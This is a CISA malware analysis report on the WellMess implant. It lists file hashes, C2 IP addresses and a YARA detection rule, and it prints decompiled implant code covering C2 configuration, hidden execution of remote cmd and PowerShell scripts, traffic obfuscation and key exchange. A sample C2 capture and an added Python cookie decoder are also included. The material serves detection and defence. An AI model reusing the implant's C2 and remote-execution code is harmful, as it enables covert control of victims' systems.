Malware Analysis Report (AR20-198B)

MAR-10296782-2.v1 – WELLMESS

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

The Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA). This malware has been identified as WELLMESS. Advanced persistent threat (APT) groups have been identified using this malware. For more information regarding this malware, please visit: https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development

This report analyzes six unique files. The files are variants of the malware family known as "WellMess". These implants allow a remote operator to establish encrypted command and control (C2) sessions and to securely pass and execute scripts on an infected system.

The WellMess samples include one 32-bit Windows executable and five Executable and Linkable Format (ELF) files written in Go, an open source programming language. The report includes analysis of a compiled .NET application extracted from one of the 32-bit Windows executables.

The ELF and 32-bit Windows executables have similar functionality; both collect the state of system privileges (disabled or enabled) from the infected system and encrypt the data via a Rivest cipher 6 (RC6) algorithm, then dynamically generate Advanced Encryption Standard (AES) keys, which are exchanged via a Rivest–Shamir–Adleman (RSA) secured key transfer scheme. Both versions also allow an operator to pass AES encrypted executable scripts to infected systems.

For a downloadable copy of IOCs, see MAR-10296782-2.v1.stix.

Submitted Files (6)

14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2 (14e9b5e214572cb13ff87727d68063...)

5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb (5ca4a9f6553fea64ad2c724bf71d0f...)

7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee (7c39841ba409bce4c2c35437ecf043...)

953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a (953b5fc9977e2d50f3f72c6ce85e89...)

e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09 (e329607379a01483fc914a47c0062d...)

fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950 (fd3969d32398bbe3709e9da5f83269...)

Additional Files (1)

47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 (WellMess.net.extract.bin)

IPs (5)

103.73.188.101

141.98.212.55

192.48.88.107

209.58.186.196

85.93.2.116

Findings

953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a

Tags

trojan

Details
Name 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a
Size 172032 bytes
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 f18ced8772e9d1a640b8b4a731dfb6e0
SHA1 92f7b470c5a2c95a4df04c2c5cd50780f6dbdda1
SHA256 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a
SHA512 c4ac5332ee27b3da002c8a55a1e99aefeb503a69b8eb1ce9310bcb12131d56d2efe70f50942461ec9e7c628e3d1a5f13c92faa6bb6b1c263acbe4a1af977ad50
ssdeep 1536:Lo7PHWHfGE50u3J0cMuNJdbOYOL68q4ATMMx4pnMgqZ5C/yOCy2UpiPKsNoeIlnt:E7PHwJdbJOOvkuC/yOH2CiP0ie1XF
Entropy 3.887546
Antivirus
BitDefender Gen:Variant.Razy.279280
ClamAV Win.Trojan.WellMess-6706033-0
Emsisoft Gen:Variant.Razy.279280 (B)
McAfee GenericRXEI-SR!F18CED8772E9
NANOAV Trojan.Win32.WellMess.fignvr
Quick Heal Trojan.Wellmess
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = "CISA Code & Media Analysis"
        Date= "2020-07-06"
        Last_Modified="20200706_1017"
        Actor="n/a"
        Category="Trojan"
        Family="WellMess"
        Description = "Detects WellMess implant and SangFor Exploit"
        MD5_1 = "4d38ac3319b167f6c8acb16b70297111"
        SHA256_1 = "7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee"
        MD5_2 = "a32e1202257a2945bf0f878c58490af8"
        SHA256_2 = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
        MD5_3 = "861879f402fe3080ab058c0c88536be4"
        SHA256_3 = "14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2"
        MD5_4 = "2f9f4f2a9d438cdc944f79bdf44a18f8"
        SHA256_4 = "e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09"
        MD5_5 = "ae7a46529a0f74fb83beeb1ab2c68c5c"
        SHA256_5 = "fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950"
        MD5_6 = "f18ced8772e9d1a640b8b4a731dfb6e0"
        SHA256_6 = "953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a"
        MD5_7 = "3a9cdd8a5cbc3ab10ad64c4bb641b41f"
        SHA256_7 = "5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb"
        MD5_8 = "967fcf185634def5177f74b0f703bdc0"
        SHA256_8 = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
        MD5_9 = "c5d5cb99291fa4b2a68b5ea3ff9d9f9a"
        SHA256_9 = "65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75"
        MD5_10 = "01d322dcac438d2bb6bce2bae8d613cb"
        SHA256_10 = "0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494"
        MD5_11 = "8777a9796565effa01b03cf1cea9d24d"
        SHA256_11 = "83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18"
        MD5_12 = "507bb551bd7073f846760d8b357b7aa9"
        SHA256_12 = "47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854"
    strings:
        $0 = "/home/ubuntu/GoProject/src/bot/botlib/chat.go"
        $1 = "/home/ubuntu/GoProject/src/bot/botlib.Post"
        $2 = "GoProject/src/bot/botlib.deleteFile"
        $3 = "ubuntu/GoProject/src/bot/botlib.generateRandomString"
        $4 = "GoProject/src/bot/botlib.AES_Decrypt"
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = "get_keyRC6"
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = "GoProject/src/bot/botlib.wellMess"
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-28 07:14:10-04:00
Import Hash f34d5f2d4577ed6d9ceec516c1f5a744
Company Name Microsoft Corporation
File Description Power Settings Command-Line Tool
Internal Name powercfg.exe
Legal Copyright © Microsoft Corporation. All rights reserved.
Original Filename powercfg.exe
Product Name Microsoft® Windows® Operating System
Product Version 6.1.7600.16385 (win7_rtm.090713-1255)
PE Sections
MD5 Name Raw Size Entropy
b90f84adffd98c3c63291dc54f766f18 header 4096 0.462120
25e1daba00e54a31c1d9bb459988f669 .text 159744 4.056043
bb5030c93de573a2819699404e0436be .rsrc 4096 2.256683
f662c2f95c916d5bd4f0c939236a81e9 .reloc 4096 0.016408
Packers/Compilers/Cryptors
Microsoft Visual C# v7.0 / Basic .NET
Relationships
953b5fc997... Created 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854
Description

This file is a malicious compiled .NET application. It decrypts and loads an embedded dynamic link library (DLL) "WellMess.net.extract.bin" (47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854).

Screenshots
Figure 1 - Screenshot of the code structure which decrypts the embedded DLL.

47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854

Tags

trojan

Details
Name WellMess.net.extract.bin
Size 45056 bytes
Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 507bb551bd7073f846760d8b357b7aa9
SHA1 23033dcad2d60574ea8a65862431f46b950e54c3
SHA256 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854
SHA512 fbad8f6e4c2a49ad7e030bfc069b830027942383a5429ac129ba4880c7f90d9e1ec84186755cbb61c39b41096d7969fa5e1e7a13918d1677045fb52f0fa70c7f
ssdeep 768:vLTf79aYYuGhmohyWdDZo/G9sklJL+9Ok/JSbrvfMAQ:/fMtYG9PB+9OyYXHhQ
Entropy 4.625315
Antivirus

No matches found.

YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS (identical to the rule listed under 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a above)
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-27 09:22:21-04:00
Import Hash dae02f32a21e03ce65412f6e56942daa
Company Name Microsoft Corporation
File Description  
Internal Name x643.Microsoft.Dtc.PowerShell.dll
Legal Copyright Copyright (c) Microsoft Corporation. All rights reserved.
Original Filename x643.Microsoft.Dtc.PowerShell.dll
Product Name Microsoft (R) Windows (R) Operating System
Product Version 10.0.14393.0
PE Sections
MD5 Name Raw Size Entropy
668481e5e1971f610581ea0b01b617b5 header 4096 0.434226
ced7014e20c39fba49386f6aef5e1203 .text 32768 5.701312
1d4922f19bd3e79cfdf93cd91be7af27 .rsrc 4096 1.150437
da55cd9f0f50ad5c82000ca03bfaa4be .reloc 4096 0.013127
Packers/Compilers/Cryptors
Microsoft Visual C# v7.0 / Basic .NET
Relationships
47cdb87c27... Connected_To 85.93.2.116
47cdb87c27... Created_By 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a
Description

This file is a compiled .NET application. It has been identified as a variant of the WellMess malware family. Displayed below is a function named “HXYGVr()” which was extracted from this application:

—Begin Extracted Function—
public void HXYGVr()
   {
    Variable.url = "hxxp[:]//85.93.2.116";
    string Address = "";
    Variable.proxy = !string.IsNullOrEmpty(Address) ? new WebProxy(Address) : (WebProxy) null;
    Variable.serverType = "GO";
    Variable.userAgent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0";
    Variable.maxPostSize = 5000000;
    Variable.keyRC6 = "UJqqarUGKm1kR1mQMf5K2g==";
    Key publicKey;
    publicKey.keySize = 2048;
    publicKey.publicKey = "<RSAKeyValue><Modulus>4Dy24gTFNYA/jq6SYiAkdRvY1ieWqM9R8dwo0uL+4GzaRObZEoUaZSHhvfeD1v762+duL1LgAcuXJeRg4PB4cGdpZqjKtB2BKIDJv3h2GNad8OsQiNY9b7Pr1Wrm2VsuS77higj0o82IWqpr4VYLaRQB1mY463WPfMv9kuOmYTSAkvw42qo1P9ud5pPptRfVUHfn0xT4idhxfAsVvb0Dm4iJDvk2Lt4op07aIyzoMPvv4ByE68xx6LoMfvu/hDby6gnHb//94lUGXSJbsEDL26DgYXH6zUooRAFZA1aFr/MonJaLRUuZLycXeSiAXDk3hglhNfH7s+ru7QEnAoTrRQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>";
    Variable.interval = 12.0;
    if (!this.IsInit)
    {
       Init init = new Init(publicKey);
       this.Hash = Variable.hash;
       this.Skey = Variable.keySymm;
       this.IsInit = true;
       this.Ua = Variable.userAgent;
       this.MaxPostSize = Variable.maxPostSize;
       this.HealthInterval = Variable.interval;
    }
    else
    {
       Variable.hash = this.Hash;
       Variable.keySymm = this.Skey;
       Variable.userAgent = this.Ua;
       Variable.maxPostSize = this.MaxPostSize;
       Variable.interval = this.HealthInterval;
       Dictionary<string, string> segmentsMessage = Chat.Download(Variable.hash, "rc", string.Empty);
       if (segmentsMessage["head"] == "G")
       {
        this.Complete = true;
        if (!this.Hx)
           return;
        Chat.Send(Encoding.UTF8.GetBytes("Missed me?"), Variable.keySymm, Variable.hash + "/h", "a", "h", Variable.maxPostSize);
       }
       else if (segmentsMessage["head"] == "C")
       {
        new Chunks().Join((object) new ChatParameters()
        {
           segmentsMessage = segmentsMessage
        });
        this.Complete = false;
        Thread.Sleep(20000);
       }
       else if (segmentsMessage["service"] == "p")
       {
        Init init = new Init(publicKey);
        this.Hash = Variable.hash;
        this.Skey = Variable.keySymm;
        this.Complete = false;
       }
       else
       {
        new Choise().Work(segmentsMessage);
        this.Complete = false;
        this.Ua = Variable.userAgent;
        this.MaxPostSize = Variable.maxPostSize;
        this.HealthInterval = Variable.interval;
       }
     }
   }
—End Extracted Function—

This function appears to be the main export of the DLL; it initiates a C2 session with the implant's remote C2 server at the Internet Protocol (IP) address 85.93.2.116. The function contains the public RSA key the malware uses to secure communication with its C2 server. It also contains an RC6 cryptographic key, which is used to protect state information within the C2 sessions, such as the hash value generated to uniquely identify the target system.

The malware accepts and executes PowerShell and batch scripts from a remote operator on the infected system. These scripts are delivered within a C2 session secured with AES encryption. In addition, the AES key transfer between the implant and the remote operator is encrypted using RSA asymmetric cryptography, which makes malicious executable code traveling over the network difficult to detect. The function which provides the script execution capability is illustrated below. Note: executing a script using this method will result in a separate malicious process:

—Begin Command Function—
public void Command(object message)
   {
    ChatParameters chatParameters = (ChatParameters) message;
    try
    {
       string s = string.Empty;
       Match match = new Regex("fileName:(?<fn>.*?)\\sargs:(?<arg>.*)\\snotwait:(?<nw>.*)", RegexOptions.IgnoreCase | RegexOptions.Multiline | RegexOptions.Singleline).Match(chatParameters.segmentsMessage["body"]);
       string str1 = match.Result("${fn}").ToString();
       string script = match.Result("${arg}").ToString();
       string str2 = match.Result("${nw}").ToString();
       Process process = new Process();
       ProcessStartInfo processStartInfo = new ProcessStartInfo();
       processStartInfo.CreateNoWindow = true;
       processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
       processStartInfo.UseShellExecute = false;
       processStartInfo.RedirectStandardOutput = true;
       processStartInfo.FileName = str1;
       if (str1 == "powershellScript")
       {
        s = BotChat.Pshell(script);
       }
       else
       {
        if (!string.IsNullOrEmpty(script))
           processStartInfo.Arguments = !(str1 == "cmd.exe") ? script : "/c " + script;
        process.StartInfo = processStartInfo;
        process.Start();
        if (string.IsNullOrEmpty(str2))
        {
           s = process.StandardOutput.ReadToEnd();
           process.WaitForExit();
        }
       }
       process.Close();
       this.Reply(Encoding.UTF8.GetBytes(s), chatParameters.segmentsMessage["head"], chatParameters.segmentsMessage["service"]);
    }
    catch (Exception ex)
    {
       this.Reply(Encoding.UTF8.GetBytes(ex.Message.ToString()), chatParameters.segmentsMessage["head"], chatParameters.segmentsMessage["service"]);
       Thread.Sleep(1000);
    }
   }
—End Command Function—

The implant can also run PowerShell scripts directly from memory. The malware contains the following function providing this capability. Note: executing a PowerShell script using this method will not result in a separate malicious process.

—Begin PowerShell Function—
private static string Pshell(string script)
   {
    string empty = string.Empty;
    Collection<PSObject> collection;
    using (Runspace runspace = RunspaceFactory.CreateRunspace())
    {
       try
       {
        runspace.Open();
        using (PowerShell powerShell = PowerShell.Create())
        {
           powerShell.Runspace = runspace;
           ScriptBlock scriptBlock = ScriptBlock.Create(script);
           powerShell.AddCommand("Invoke-Command").AddParameter("ScriptBlock", (object) scriptBlock);
           collection = powerShell.Invoke();
        }
       }
       finally
       {
        runspace.Close();
       }
    }
    foreach (PSObject psObject in collection)
       empty += psObject.ToString();
    return empty;
   }
—End PowerShell Function—

Displayed below is sample communication traffic between this WellMess implant and its C2 server.

—Begin Sample Network Traffic—
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Language: en-US,en;q=0.8
Cookie: 4NJZrNBl=80WOGU+5py+Cq0GVi+JMiq6ka+x%3aGeT+%3a7jpfqo+q1%3aa+6j9Delt+yDQ+SpTmS5+T5TpR.+DwUNdr+gjsJf+svT+Byw+sysM.+AP9LC+Rtsol+Fkj15U3+1Gke+%2c%2cAM.+6eaJV+h0tJ%2ci+sjhfQt7+EmI;F5R1hdiM=A+YDy%2cab.+GI65+lRmzt+EF7lLr4+QZB+LQmBR.+f84+tVTX0z+6WMLc+++
Host: 85.93.2.116
Content-Length: 798
Expect: 100-continue
Accept-Encoding: deflate
Connection: Keep-Alive

PXYaTG AoW 0gVV4R xKRORQU em5Jz OqxrlVM PweS oOVI30A 1oZ OgLqNp JyA1q. Dos2gp N0c3C q:d tKX IdNx. zkTbV QmOjB HXU::fP eUN4 jBOI. RlCFb xOTaSL C0k:BKg EGVy fsoDDZ. arfb ,2fvY xYlkGpW ,D6 ikXZ6. kJT 6N82Au ,2Uf t7mOYW9 DLyAy. CF60ZX TIswg X7XBA: E6Xj2a unGhGIR. fir 1rH1jkG QPEc t1I53 iED. aomEaY n84rKx ECxZ0K yeDLh4 suZyqzp. ITxjQq b58:jvm lsOT AC,o mlM1. V3oUd U6bU:y8 WzJ8t pWUN76I KxnVY3. uUTz,K jDK qba yqU 1AvBN. pVg 3Duu 34IA g9jZc pr77J. 0h8lQGU lm3ReWd F2SB 7Yes fk1J. ndl8o tpzJ NhXH bjNO 8nm:Aqm. l0HHBo dOypefA hja IAQ ,NUHFF7. yt, F:Gp OU1 S3e4GZ NU7HvZW. hAINPwR kDCE2Ev cQiiXU TXY Kpt. prnvUns el4sMa 9do tw: eisS58C. d2wKh :T0F kxk mZTI jU1. 4y:Y6l YQgZ6t 0uANCK2 UpHCRc2 cbgnSm. UFu k:cIT cBH5 Fxk 2Jk. ErKKHod 0dgeQ5e 7MV 8PH0 tsUn. dMd,glf x3Q ZpNEDt FnvMxh IM:p:. lbabsz3EA    
—End Sample Network Traffic—

Contained within the “Cookie:” section of the data is simple session information, including a hash that is unique to the target system. This hash is computed as the SHA256 of several pieces of information about the victim system concatenated into a single string (Figure 2). These pieces of information include the computer name, session name, and user domain.

This data is RC6 encrypted with a hard-coded key and then Base64 encoded. The Base64 output is then transformed with the following algorithm, which produces slightly modified Base64 data in which spaces separate chunks of the original Base64 string (the characters “=”, “+” and “/” are replaced by a space, “,” and “:” respectively):

—Begin FromBase64ToNormal Function—
public static string FromBase64ToNormal(string base64Str)
   {
    int num1 = 0;
    int length1 = base64Str.Length;
    string str1 = base64Str.Replace("=", " ");
    base64Str = string.Empty;
    string str2 = str1.Replace('+', ',');
    string empty1 = string.Empty;
    string str3 = str2.Replace('/', ':');
    string empty2 = string.Empty;
    StringBuilder stringBuilder = new StringBuilder();
    int length2 = str3.TrimEnd().Length;
    Random random = new Random();
    int startIndex = 0;
    while (startIndex < length2 - 9)
    {
       int length3 = random.Next(3, 8);
       int num2 = startIndex + length3;
       if (num1 > 5 && num1 % 5 == 0)
        stringBuilder.Append(str3.Substring(startIndex, length3) + ". ");
       else
        stringBuilder.Append(str3.Substring(startIndex, length3) + " ");
       startIndex = num2;
       ++num1;
    }
    stringBuilder.Append(str3.Substring(startIndex));
    string empty3 = string.Empty;
    return stringBuilder.ToString();
   }
—End FromBase64ToNormal Function—

The newly encoded string is then broken into two separate parts at a random offset (Figure 3). Each part is prepended with a random string followed by an “=” character, and both strings are then Uniform Resource Locator (URL) encoded.
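As an added analyst example (not code from the report or from the malware), the following Python reverses the encoding described above: it reassembles the two URL-encoded cookie items, strips the inserted spaces and “.” markers, restores the three substituted Base64 characters and re-pads, yielding the RC6 ciphertext bytes. It also carries a port of FromBase64ToNormal() with an injectable chunk-length source so the round trip can be checked; SAMPLE_COOKIE is the Cookie value from the capture above, the cookie names in encode_cookie() are constructed, and RC6 decryption itself is not attempted.

```python
import base64
import random
import re
from urllib.parse import quote_plus, unquote_plus

# Cookie header value copied from the report's sample network traffic.
SAMPLE_COOKIE = (
    "4NJZrNBl=80WOGU+5py+Cq0GVi+JMiq6ka+x%3aGeT+%3a7jpfqo+q1%3aa+6j9Delt+yDQ"
    "+SpTmS5+T5TpR.+DwUNdr+gjsJf+svT+Byw+sysM.+AP9LC+Rtsol+Fkj15U3+1Gke+%2c"
    "%2cAM.+6eaJV+h0tJ%2ci+sjhfQt7+EmI;F5R1hdiM=A+YDy%2cab.+GI65+lRmzt+EF7lLr4"
    "+QZB+LQmBR.+f84+tVTX0z+6WMLc+++"
)


def from_base64_to_normal(base64_str, next_len=None):
    """Python port of the implant's FromBase64ToNormal().

    '=' -> ' ', '+' -> ',', '/' -> ':', then the string is cut into chunks
    of 3..7 characters separated by a space; every fifth chunk after the
    sixth gets a '. ' separator.  next_len() stands in for Random.Next(3, 8)
    so a caller can make the output deterministic.
    """
    if next_len is None:
        next_len = lambda: random.randrange(3, 8)
    s = base64_str.replace("=", " ").replace("+", ",").replace("/", ":")
    out = []
    start, n = 0, 0
    limit = len(s.rstrip()) - 9          # matches str3.TrimEnd().Length - 9
    while start < limit:
        length = next_len()
        sep = ". " if n > 5 and n % 5 == 0 else " "
        out.append(s[start:start + length] + sep)
        start += length
        n += 1
    out.append(s[start:])                # remainder keeps the padding spaces
    return "".join(out)


def normal_to_base64(text):
    """Undo from_base64_to_normal(): drop separators, restore the alphabet,
    and recompute the '=' padding that was turned into spaces."""
    s = text.replace(" ", "").replace(".", "")
    s = s.replace(",", "+").replace(":", "/")
    if not re.fullmatch(r"[A-Za-z0-9+/]*", s) or len(s) % 4 == 1:
        raise ValueError("not WellMess-encoded Base64")
    return s + "=" * (-len(s) % 4)


def decode_cookie(cookie_value):
    """Reassemble the two '<random>=<part>' cookie items, URL-decode them and
    return the RC6 ciphertext carried in the header."""
    parts = []
    for item in cookie_value.split(";"):
        item = item.strip()
        if not item:
            continue
        _name, sep, value = item.partition("=")
        if not sep:
            raise ValueError("cookie item without '=': %r" % item)
        parts.append(unquote_plus(value))
    return base64.b64decode(normal_to_base64("".join(parts)), validate=True)


def encode_cookie(ciphertext, names=("n1", "n2"), split_at=None, next_len=None):
    """Forward direction as the report describes it (used here only to check
    the decoder): encode, split at an offset, prefix each part with a
    constructed name and '=', URL-encode both."""
    text = from_base64_to_normal(base64.b64encode(ciphertext).decode(), next_len)
    if split_at is None:
        split_at = random.randrange(1, len(text))
    first, second = text[:split_at], text[split_at:]
    return "%s=%s;%s=%s" % (names[0], quote_plus(first, safe=""),
                            names[1], quote_plus(second, safe=""))


if __name__ == "__main__":
    blob = decode_cookie(SAMPLE_COOKIE)
    print("cookie carries %d bytes of RC6 ciphertext (%d blocks)"
          % (len(blob), len(blob) // 16))
```

The sample cookie decodes to a whole number of 16-byte blocks, which is what one expects from RC6 ciphertext and is a cheap sanity check when triaging similar headers.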

Upon execution, the malware generates an AES key which will be used during C2 sessions. This key is generated via the following function:

—Begin AES Key Generation Function—
public static Dictionary<string, byte[]> GenerateSymmKey()
   {
    Dictionary<string, byte[]> dictionary = new Dictionary<string, byte[]>();
    byte[] hash = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(Membership.GeneratePassword(16, 4)));
    byte[] randomBytes = GenerateKeys.GetRandomBytes(8);
    using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
    {
       rijndaelManaged.KeySize = 256;
       rijndaelManaged.BlockSize = 128;
       Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(hash, randomBytes, 1000);
       rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
       rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
       dictionary.Add("Key", rijndaelManaged.Key);
       dictionary.Add("IV", rijndaelManaged.IV);
    }
    return dictionary;
   }
—End AES Key Generation Function—

The malware also contains the following hard-coded public RSA key:

—Begin Pub RSA Key—
<RSAKeyValue><Modulus>4Dy24gTFNYA/jq6SYiAkdRvY1ieWqM9R8dwo0uL+4GzaRObZEoUaZSHhvfeD1v762+duL1LgAcuXJeRg4PB4cGdpZqjKtB2BKIDJv3h2GNad8OsQiNY9b7Pr1Wrm2VsuS77higj0o82IWqpr4VYLaRQB1mY463WPfMv9kuOmYTSAkvw42qo1P9ud5pPptRfVUHfn0xT4idhxfAsVvb0Dm4iJDvk2Lt4op07aIyzoMPvv4ByE68xx6LoMfvu/hDby6gnHb//94lUGXSJbsEDL26DgYXH6zUooRAFZA1aFr/MonJaLRUuZLycXeSiAXDk3hglhNfH7s+ru7QEnAoTrRQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
—End Pub RSA Key—

The encrypted portion of the callout in the main body of the POST is the dynamically generated AES key encrypted with the hard-coded RSA public key. The following function is utilized to conduct the initial C2 connection to the C2 server. The “Message” variable argument will contain the dynamically generated AES key encrypted utilizing the embedded RSA public key.

—Begin SendMessage Function—
public void SendMessage(string Message, string idMess, string askOrReply, string service)
   {
    TransportProtocol transportProtocol = new TransportProtocol();
    string message = transportProtocol.FullMessage(idMess, askOrReply, service);
    string service1 = new RC6(Convert.FromBase64String(Variable.keyRC6), Variable._serverType).Encrypt(message);
    Dictionary<HttpStatusCode, List<string>> dictionary = transportProtocol.Post(Message, service1, true);
    for (int index = 0; !dictionary.ContainsKey(HttpStatusCode.OK) && index < 3; ++index)
    {
       Thread.Sleep(new Random().Next(5, 20) * 1000);
       dictionary = transportProtocol.Post(Message, service1, true);
    }
   }
—End SendMessage Function—

The malware contains a function named “DownloadVar” which allows the malware to receive and parse messages from the remote operator. As illustrated, the malware will decrypt the body of these messages using the dynamically generated AES key mentioned above.

—Begin DownloadVar Function—
private static Dictionary<string, string> DownloadVar(
    string idMess,
    string askOrReply,
    string service,
    bool client)
   {
    List<string> message = new Transport().ReceiveMessage(idMess, askOrReply, service, client);
    try
    {
       Dictionary<string, string> dictionary = new ParseMessage(message[0]).Parse();
       if (!dictionary.ContainsKey("body"))
        dictionary.Add("body", message[1]);
       if (dictionary[nameof (service)] == "p" || dictionary["head"] == "C" || dictionary["head"] == "G" || !client)
        return dictionary;
       if (string.IsNullOrEmpty(dictionary["body"]))
        return dictionary;
       try
       {
        byte[] numArray = SymmCrypto.AES_Decrypt(Convert.FromBase64String(dictionary["body"]), Variable.keySymm);
        dictionary["body"] = !dictionary[nameof (service)].StartsWith("f") ? Message.UnPack(numArray) : Message.UnPackB(numArray);
        return dictionary;
       }
       catch (FormatException ex)
       {
        return (Dictionary<string, string>) null;
       }
    }
    catch (Exception ex)
    {
       return (Dictionary<string, string>) null;
    }
   }
—End DownloadVar Function—

Screenshots
Figure 2 - Data contained within the "cookie:" header of the initial traffic to the remote C2, being encrypted with RC6.

Figure 3 - Malware generating hash unique for the victim system. This hash value in an encrypted and encoded format will be included in the "cookie:" header of the transmissions to the C2 server.

Figure 4 - Encrypted "cookie:" header being formatted for transmission to the remote C2 server.

85.93.2.116

Tags

command-and-control

Whois

Queried whois.ripe.net with "-B 85.93.2.116"...
% Information related to '85.93.2.0 - 85.93.2.255'
% Abuse contact for '85.93.2.0 - 85.93.2.255' is 'noc@lubnanet.com'
inetnum:        85.93.2.0 - 85.93.2.255
netname:        Arcompus-Medianet
descr:         Arcompus-Medianet
country:        LB
org:            ORG-AMIS1-RIPE
admin-c:        AMN61-RIPE
tech-c:         AMN61-RIPE
status:         ASSIGNED PA
